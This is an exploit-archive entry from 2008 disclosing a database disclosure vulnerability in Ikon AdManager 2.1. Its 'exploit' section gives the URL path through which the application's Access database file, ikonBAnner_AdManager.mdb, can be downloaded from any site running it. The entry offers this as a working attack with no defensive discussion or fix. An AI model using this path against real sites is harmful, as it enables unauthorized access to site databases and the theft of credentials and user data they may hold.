id: 4377
date: 12/07/2008
title: Ikon AdManager 2.1 Remote Database Disclosure Vulnerability
author: Ghost Hacker
cves: 

===========================================================
Ikon AdManager 2.1 Remote Database Disclosure Vulnerability
===========================================================


####################################################################################################
# Ikon AdManager 2.1 (ikonBAnner_AdManager.mdb) Database Disclosure Vulnerability                  #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] Bug : Database Disclosure                                                                     #
#[~] Name Script : Ikon AdManager 2.1                                                              #
#[~] Download : http://www.dotnetindex.com/downloads/easy_download_getinfo.asp?id=7                #
####################################################################################################
#[~]Exploit                                                                                        #
# http://xxxx.com/[path]/database/ikonBAnner_AdManager.mdb                                         #
####################################################################################################



#  0day.today [2023-03-23]  #